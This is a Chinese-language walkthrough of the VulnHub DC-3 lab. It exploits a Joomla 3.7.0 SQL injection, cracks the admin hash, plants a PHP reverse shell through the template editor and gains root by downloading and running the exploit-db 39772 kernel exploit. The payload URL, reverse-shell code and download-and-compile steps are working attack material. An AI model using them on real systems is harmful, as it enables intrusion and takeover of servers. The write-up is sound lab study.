vulnhun-DC-3

dc-3

kali：192.168.43.149

dc3：192.168.43.61

只开放了80端口

sudo nmap --script=vuln 192.168.43.61

漏洞扫描发现一个sql注入感觉有价值

joomla3.7.0有sql注入漏洞
http://192.168.43.61/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version(),0x7e),1)

手工注入一下

当前数据库：joomladb

schema_name：joomladb,mysql,performance_sche
table_name：#__associations,#__banner

用sqlmap跑出username字段——admin

password字段——$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

密码是hash值

john爆破得到明文：snoopy

登录进入后台成功

在后台的templates点击beez3有新建文件接口

建一个php文件，内容为：

<?php
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>
#$ip为kali的ip，端口为Kali监听端口

访问：http://192.168.43.61/templates/beez3/shell.php

反弹shell成功，发现有python环境，获取交互式shell：

python -c 'import pty;pty.spawn("/bin/sh")'

whoami查看用户——www-date

cat /etc/passwd查看用户权限

uname -a查看系统

这里需要提权

尝试find提权：

which find
ls -l find路径
没有s不能用find提权

尝试vim提权失败

找wp

说是这个ubuntu16.04有系统漏洞可用于提权

searchsploit Ubuntu16.04找到

打开查看这个文件

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

文件后面有个下载路径

在控制靶机shell的界面下载

wget url

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压 unzip 39772.zip

cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
执行完上面文件后，发现变成root用户

总结

需要了解的：

CVE-2017-8917
 
joomla3.7.0的sql注入漏洞
 
注入点：http://192.168.43.61/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version(),0x7e),1)

该Ubuntu系统提权漏洞

在写入反弹shell的php文件后，文件所在的路径怎么试出来的

发现在页面有提示：

收获：

了解了searchsploit工具

利用sql注入得到用户名及密码，直接爆破密码登录后台

进入后台一般是找创建文件（有些模板、扩展）的接口来写木马或者反弹shell

梳理

前期的主机发现、端口探测、目录扫描、漏洞扫描都没问题

最终确定了cms的一个sql注入漏洞有利用价值

出问题的地方：sql注入不熟悉（手工打不出来）、sqlmap工具不熟悉（边查边用的）

然后爆破密码的hash值，登入后台都没问题

出问题的地方：在后台找接口写木马或弹shell的地方找了半天，还有就是shell.php所在路径寻找不熟悉

然后反弹shell成功、python获取交互式shell

出问题的地方：提权压根不会